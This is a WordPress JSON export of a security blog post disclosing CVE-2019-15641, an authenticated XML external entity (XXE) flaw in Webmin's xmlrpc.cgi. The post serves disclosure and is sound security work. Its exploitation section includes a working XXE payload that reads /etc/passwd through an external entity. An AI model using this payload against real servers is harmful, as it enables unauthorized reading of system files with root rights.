{"id":520,"date":"2019-07-30T11:42:34","date_gmt":"2019-07-30T09:42:34","guid":{"rendered":"https:\/\/www.calypt.com\/blog\/?p=520"},"modified":"2019-08-27T11:08:15","modified_gmt":"2019-08-27T09:08:15","slug":"authenticated-xxe-on-webmin","status":"publish","type":"post","link":"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/","title":{"rendered":"CVE-2019-15641 &#8211; Authenticated XXE on Webmin <= 1.930"},"content":{"rendered":"\n<figure class=\"wp-block-image\"><img decoding=\"async\" loading=\"lazy\" width=\"600\" height=\"264\" src=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/08\/2019-07-30-102728_1110x488_scrot-1024x450.png\" alt=\"\" class=\"wp-image-549\"\/><\/figure>\n\n\n\n<h2>Description<\/h2>\n\n\n<p>From <a href=\"http:\/\/www.webmin.com\">http:\/\/www.webmin.com<\/a> :<\/p>\n<blockquote>\n<p style=\"text-align: justify;\">Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like&nbsp;<tt>\/etc\/passwd<\/tt>, and lets you manage a system from the console or remotely. 
See the&nbsp;<a href=\"http:\/\/www.webmin.com\/standard.html\">standard modules<\/a>&nbsp;page for a list of all the functions built into Webmin.<\/p>\n<\/blockquote>\n<p>By default, the endpoint xmlrpc.cgi is enabled with basic auth, but only 3 users can POST data to it:<\/p>\n<ul>\n<li>root;<\/li>\n<li>admin;<\/li>\n<li>sysadm.<\/li>\n<\/ul>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" loading=\"lazy\" width=\"933\" height=\"134\" src=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-103811_933x134_scrot.png\" alt=\"\" class=\"wp-image-523\" srcset=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-103811_933x134_scrot.png 933w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-103811_933x134_scrot-600x86.png 600w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-103811_933x134_scrot-768x110.png 768w\" sizes=\"(max-width: 933px) 100vw, 933px\" \/><figcaption>User restriction in xmlrpc.cgi<\/figcaption><\/figure>\n\n\n<p>As its name suggests, the service handles XML messages. 
The Perl <a href=\"https:\/\/metacpan.org\/pod\/XML::Parser\">XML::Parser<\/a> module is used <strong>without disabling the resolution of external entities<\/strong>:<\/p>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" loading=\"lazy\" width=\"639\" height=\"198\" src=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-110314_639x198_scrot.png\" alt=\"\" class=\"wp-image-524\" srcset=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-110314_639x198_scrot.png 639w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/07\/2019-07-30-110314_639x198_scrot-600x186.png 600w\" sizes=\"(max-width: 639px) 100vw, 639px\" \/><figcaption>Parser initialisation in xmlrpc.cgi<\/figcaption><\/figure>\n\n\n\n<h2>Exploitation<\/h2>\n\n\n<p>Because of this permissive parser, a successfully authenticated attacker can exploit an <a href=\"https:\/\/www.owasp.org\/index.php\/XML_External_Entity_(XXE)_Processing\">XXE<\/a> to retrieve local files or discover internal networks, with root rights since Webmin runs as root. Simple XXE payloads can be used, for example:<\/p>\n\n\n<pre class=\"wp-block-code\"><code>&lt;?xml version=\"1.0\" encoding=\"utf-8\"?>\n&lt;!DOCTYPE methodCall [\n    &lt;!ENTITY file SYSTEM \"file:\/\/\/etc\/passwd\">\n\n]>\n&lt;methodCall>\n&lt;methodName>&file;&lt;\/methodName>\n&lt;\/methodCall><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Description From http:\/\/www.webmin.com : Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like&nbsp;\/etc\/passwd, and lets you manage a system from the console or remotely. 
See the&nbsp;standard [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[1],"tags":[68,70,59,69,73,66],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.1.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<link rel=\"canonical\" href=\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2019-15641 - Authenticated XXE on Webmin\" \/>\n<meta property=\"og:description\" content=\"Description From http:\/\/www.webmin.com : Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like&nbsp;\/etc\/passwd, and lets you manage a system from the console or remotely. See the&nbsp;standard [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/\" \/>\n<meta property=\"og:site_name\" content=\"Calypt\" \/>\n<meta property=\"article:published_time\" content=\"2019-07-30T09:42:34+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-08-27T09:08:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/08\/2019-07-30-102728_1110x488_scrot-1024x450.png\" \/>\n<meta name=\"twitter:label1\" content=\"Est. 
reading time\">\n\t<meta name=\"twitter:data1\" content=\"1 minute\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.calypt.com\/blog\/#website\",\"url\":\"https:\/\/www.calypt.com\/blog\/\",\"name\":\"Calypt\",\"description\":\"Security thoughts\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/www.calypt.com\/blog\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/#primaryimage\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/08\/2019-07-30-102728_1110x488_scrot-1024x450.png\",\"contentUrl\":\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2019\/08\/2019-07-30-102728_1110x488_scrot-1024x450.png\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/#webpage\",\"url\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/\",\"name\":\"CVE-2019-15641 - Authenticated XXE on 
Webmin\",\"isPartOf\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/#primaryimage\"},\"datePublished\":\"2019-07-30T09:42:34+00:00\",\"dateModified\":\"2019-08-27T09:08:15+00:00\",\"author\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/#\/schema\/person\/b39592c4058c8985f373832ef96a7cf6\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"item\":{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.calypt.com\/blog\/\",\"url\":\"https:\/\/www.calypt.com\/blog\/\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"position\":2,\"item\":{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/\",\"url\":\"https:\/\/www.calypt.com\/blog\/index.php\/authenticated-xxe-on-webmin\/\",\"name\":\"CVE-2019-15641 &#8211; Authenticated XXE on Webmin &lt;= 1.930\"}}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.calypt.com\/blog\/#\/schema\/person\/b39592c4058c8985f373832ef96a7cf6\",\"name\":\"Lo\\u00efc\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.calypt.com\/blog\/#personlogo\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/3c9955a661ca1f761736f9a7f32772c3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/3c9955a661ca1f761736f9a7f32772c3?s=96&d=mm&r=g\",\"caption\":\"Lo\\u00efc\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","_links":{"self":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/520"}],"collection":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=520"}],"version-history":[{"count":11,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/520\/revisions"}],"predecessor-version":[{"id":556,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/520\/revisions\/556"}],"wp:attachment":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}